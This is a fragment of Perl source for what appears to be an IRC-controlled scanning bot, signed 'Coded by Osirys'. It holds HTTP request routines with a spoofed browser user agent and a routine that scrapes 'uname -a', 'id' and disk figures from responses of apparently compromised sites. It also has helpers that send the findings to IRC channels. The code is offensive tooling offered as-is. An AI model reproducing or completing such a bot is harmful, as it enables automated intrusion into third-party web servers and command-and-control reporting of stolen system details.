$host, $hdir ); return @l; } sub query() { $link = $_[0]; my $req = HTTP::Request->new( GET => $link ); my $ua = LWP::UserAgent->new(); $ua->timeout(3); my $response = $ua->request($req); return $response->content; } sub query1() { my $url = $_[0]; my $host = $url; my $query = $url; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; eval { my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page = "@r"; close($sock); }; return $page; } sub os() { my $site = $_[0]; my $ret = &query($site); while ( $ret =~ m/
uname -a:(.+?)\
/g ) { $un = $1; } while ( $ret =~ m/
os:(.+?)\
/g ) { $os = $1; } while ( $ret =~ m/
id:(.+?)\
/g ) { $id1 = $1; } while ( $ret =~ m/
free:(.+?)\
/g ) { $free = $1; } while ( $ret =~ m/
used:(.+?)\
/g ) { $used = $1; } while ( $ret =~ m/
total:(.+?)\
/g ) { $all = $1; } } sub unici { my @unici = (); my %visti = (); foreach my $elemento (@_) { $elemento =~ s/\/+/\//g; next if $visti{$elemento}++; push @unici, $elemento; } return @unici; } sub writ1 () { my $cont = $_[0]; print $c0n "PRIVMSG $chan1 :$cont\n"; } sub writ2 () { my $cont = $_[0]; print $c0n "PRIVMSG $chan2 :$cont\n"; } sub priv8 () { my $cont = $_[0]; print $c0n "PRIVMSG $chan2 :$cont\n"; } ## PRIVATE ## Coded by Osirys